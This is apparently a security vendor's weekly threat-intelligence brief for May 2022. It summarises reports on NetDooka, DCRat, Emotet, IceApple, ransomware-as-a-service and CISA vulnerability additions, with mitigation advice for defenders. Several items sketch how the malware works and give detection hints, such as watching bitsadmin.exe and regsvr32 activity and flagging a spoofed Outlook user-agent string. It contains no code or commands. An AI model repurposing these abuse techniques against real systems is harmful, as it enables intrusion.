Cyber Intel Brief: May 05 – 11, 2022
By Eric Ford,
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service
- Trend Micro discovered a pay-per-install service that uses the PrivateLoader malware for distributing a sophisticated malware framework, dubbed NetDooka.
- The framework consists of a loader, dropper, full-featured remote access trojan (RAT) with its own network communication protocol, and a driver that protects the RAT from being deleted or process terminated.
- Observation of this activity may be possible by monitoring for process or command activity related to bitsadmin.exe.
Mitigation recommendations include ensuring anti-virus and EDR solutions are up to date and functioning properly, providing user awareness training that informs employees on company policies and procedures on obtaining access to authorized software for cyber risk reduction purposes, adding the techniques outlined in the report to your phishing awareness and simulation exercises program, and finally, ensuring that software is up to date, with known exploited vulnerabilities identified by CISA receiving priority.
Dirty Deeds Done Dirt Cheap: Russian RAT Offers Backdoor Bargains
- BlackBerry recently analyzed the latest version of DCRat, including how it is distributed and marketed.
- DCRat offers a modular framework that includes custom plugins offered by both the author and third party sources and is sold to threat actors on a Russian cybercrime forums.
- Observation of this activity may be possible by monitoring for registry changes involving the keys listed here.
Mitigation recommendations include ensuring anti-virus and EDR solutions are up to date and functioning properly, implementing a phishing awareness training and simulation exercise program, and finally, enforcing multi-factor authentication.
Emotet: The Return of the World’s Most Dangerous Malware
- Forescout’s Vedere Labs recently analyzed a recent Emotet sample detailing the process that Emotet executes to begin the infection.
- This sample begins the infection chain once the user executes the macro in attached Microsoft Office Excel file and downloads a DLL that is executed with regsvr32.
- Observation of this activity may be possible by monitoring for suspicious process and command activity involving regsvr32.
Mitigation recommendations include disabling macro execution via group policy settings, installing and maintaining antivirus software, implementing a phishing awareness training and simulation exercise program, and finally, enforcing multi-factor authentication.
Novel IceApple Post-Exploitation Framework Detected by CrowdStrike
- CrowdStrike recently discovered a new post-exploitation framework, dubbed IceApple, that is used to conduct discovery, credential harvesting, file and directory deletion, and data exfiltration.
- When employed, IceApple was observed being used for credential harvesting and reconnaissance with data exfiltration primarily occurring shortly after initial access was gained.
- Observation of this activity may be possible by monitoring for traffic containing the user agent “Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4551; Pro).
Mitigation recommendations include ensuring all web applications, especially Microsoft Exchange, are regularly and fully patched, reviewing internet-facing architecture to include segmentation from the internal business network, implementing multi-factor authentication for remote access, and finally, installing advanced security protection systems at the host level to detect and report on malicious or anomalous activity.
Ransomware-as-a-Service: Understanding the Cybercrime Gig Economy and How to Protect Yourself
- Microsoft recently detailed several affiliates of ransomware-as-a-service (RaaS) threat groups, and their analysis includes a deep-dive analysis into individual groups and recommendations to mitigate the risk posed by the actors.
- Microsoft describes the current RaaS economy detailing how initial access brokers, affiliates, and RaaS operators coordinate efforts to compromise targets and details seven threat groups Microsoft currently tracks.
Mitigation recommendations include patching systems as soon as possible with a priority placed on those systems that are internet-exposed and a focus on known exploited vulnerabilities like those featured in CISA’s Known Exploited Vulnerabilities Catalog; ensuring anti-virus and EDR solutions are up to date, functioning properly, and hardened to vendor’s specifications; for credential hygiene, it is recommended to implement Microsoft’s guidance, available here; and finally, customers of Microsoft 365 Defender, Defender for Endpoint, and Defender Antivirus can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks.
Ransomware Tracker: The Latest Figures [May 2022]
- The Record, a Recorded Future company, released its latest figures for ransomware trends for the month of April. The tracker is updated on the 10th of every month.
- Even though ransomware incidents remailed stable, Conti showed an increase in their attacks, with 50 incidents deploying the ransomware variant. This included the variant being used against the Costa Rican government which forced them to declare a state of emergency, with the US State Department issuing a reward for the identification and/or location of key members or the arrest and/or conviction of anyone attempting to participate in a Conti incident.
To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
CISA Adds Two Vulnerabilities to the Known Exploited Vulnerabilities Catalog
- CISA has added two vulnerabilities to its Known Exploited Vulnerabilities Catalog based on reliable evidence that these vulnerabilities have been actively exploited in the wild.
- The software affected includes F5 BIG-IP and Microsoft Windows.
Deepwatch Threat Intel Team strongly urges all customers to prioritize rapid remediation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities Catalog, as part of their vulnerability management process.
What We Mean When We Say
Estimates of Likelihood
We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms unlikely and remote imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like might and might reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.
Confidence in Assessments
Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:
- High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
- Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
- Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.